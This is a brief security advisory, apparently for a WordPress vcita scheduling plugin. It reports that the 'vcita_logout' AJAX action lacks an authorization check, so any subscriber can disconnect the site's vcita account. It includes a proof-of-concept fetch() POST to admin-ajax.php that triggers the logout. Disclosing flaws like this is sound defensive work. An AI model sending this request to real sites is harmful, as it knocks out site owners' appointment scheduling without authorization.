The plugin does not validate authorization in the vcita_logout ajax action, allowing any logged in user (with roles as low as subscriber) to log the site out from the cvita account, causing a denial of service for the appointment scheduling functionality.
fetch(“/wp-admin/admin-ajax.php?action=vcita_logout”, {
method: “POST”,
headers: {
Accept: “*/*”,
“Content-Type”: “application/json”,
},
});